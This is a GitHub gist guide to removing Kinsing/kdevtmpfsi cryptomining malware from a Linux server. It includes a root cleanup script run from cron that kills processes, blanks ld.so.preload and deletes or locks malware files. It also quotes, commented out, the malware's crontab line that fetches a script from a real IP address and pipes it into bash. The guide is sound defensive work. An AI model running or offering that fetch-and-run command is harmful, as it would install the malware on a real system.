Skip to content

Instantly share code, notes, and snippets.

@ArrayIterator

ArrayIterator/KINSING-KDEVTMPFSI.md

Last active October 18, 2023 19:29
Show Gist options
  • Save ArrayIterator/ebd67a0b4862e6bfb5d021c9f9d8dcd3 to your computer and use it in GitHub Desktop.
Save ArrayIterator/ebd67a0b4862e6bfb5d021c9f9d8dcd3 to your computer and use it in GitHub Desktop.
Download ZIP
Kil the kinsing & kdevtmpfsi malware
Raw
KINSING-KDEVTMPFSI.md

Kinsing File Affected

Too many problem solver on the internet does not resolve the malware infection about kinsing. The kinsing malware also infected the network & listen into network port.

Edit the crontab

Do not delete the url of wget or curl command from kinsing malware, just comment it like. There are script checking about the crontab file

# your another crontab
# * * * * * curl http://185.122.204.197/cp.sh | bash > /dev/null 2>&1

You should need add attribute to prevent crontab file change (but it will change if kinsing run) we just test it

chattr +i /var/spool/crontabs/root

Kill all processes

Create bash script about kinsing killer on the root path (use any file name eg: /root/killer-kin.sh)

Make sure net-utils / net-tools is installed and put the file into cron directory /etc/cron.d/killer-kin

MAILTO=''
# KILLER
* * * * * root /bin/bash /root/killer-kin.sh

/root/killer-kin.sh executable script

#!/bin/bash

# ALSO TEST THE SSH STATUS
STATUS_SSH=$(pgrep ssh)
if [[ "${STATUS_SSH}" = "" ]]; then
        echo "SSH STOPPED! STARTING";
        /usr/bin/systemctl start ssh
else
        echo "SSH RUNNING"
fi

# DELETE PRELOAD LD LIBRARY
echo '' > /etc/ld.so.preload

# BOT SERVICE IS KINSING SERVICE
/usr/bin/systemctl stop bot.service &>/dev/null
/usr/bin/systemctl disable bot.service &>/dev/null

# DELETE BOT SERVICE
echo '' > /lib/systemd/system/bot.service

# KILL THE KINSING FROM NETWORK
KINSING_PROC=$(netstat -tlp | grep kinsing | awk '/kinsing */ {split($NF,a,"/"); print a[1]}')
KDEV_PROC=$(netstat -tlp | grep kdevtmpfsi | awk '/kdevtmpfsi */ {split($NF,a,"/"); print a[1]}')
if [[ $KINSING_PROC =~ ^[0-9]+$ ]]; then
        echo "KINSING FOUND IN NETWORK -> ${KINSING_PROC}";
        kill $KINSING_PROC
fi
if [[ $KDEV_PROC =~ ^[0-9]+$ ]]; then
        echo "KDEVTMPFSI FOUND IN NETWORK -> ${KDEV_PROC}";
        kill $KDEV_PROC
fi

# KILL THE KINSING PROCESS
if [[ $(pgrep kdevtmpfsi) != "" ]];then
        echo "MALWARE KDEV FOUND";
        kill $(pgrep kdevtmp)
fi
if [[ $(pgrep kinsing) != "" ]]; then
        echo "MALWARE KIN FOUND";
        kill $(pgrep kinsing)
fi

# REMOVE KINSING FROM TMP & DATA DIRECTORY
echo "DELETING KIN"
rm -f /tmp/kdevtmpfsi* /tmp/kinsing* /var/tmp/kinsing* /var/tmp/kdevtmpfsi* /etc/data/kinsing /etc/data/libsystem.so

# LAST ... FIND KINSING FROM ANY DIRECTORY
# BUT THIS IS NOT WORTH WHEN RUNNING PER MINUTES
#find / -iname kdevtmpfsi* -exec rm -fv {} \;
#find / -iname kinsing* -exec rm -fv {} \;

KINSING file definitions

Check the file /etc/ld.so.preload contain /etc/data/libsystem.so and commonly kinsing executable file in /etc/data/kinsing

  1. Kinsing executable file /etc/data/kinsing
  2. Kinsing library file /etc/data/libsystem.so or /dev/shm/libsystem.so
  3. Kinsing prevent watchdog to run, open the /etc/sysctl.conf, appending nmi_watchdog=0
  4. Temporary downloaded kinsing file (/var)?/tmp/kinsing[0-9]+? & (/var)?/tmp/kdevtmpfsi[0-9]+? (regex)

Limit the files

  1. Edit /etc/sysctl.conf add config that you need and then run : chattr +i /etc/sysctl.conf
  2. create empty file to the echo '' > /tmp/kinsing & echo '' > /tmp/kdevtmpfsi then run chattr +i /tmp/kinsing /tmp/kdevtmpfsi
  3. overwrite kinsing & libsystem.so : echo '' > /etc/data/kinsing & echo '' > /detc/data/libsystem.so then run chattr +i /etc/data/kinsing /etc/data/libsystem.so

NOTE

Recommended to make clean install or reinstall the server

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment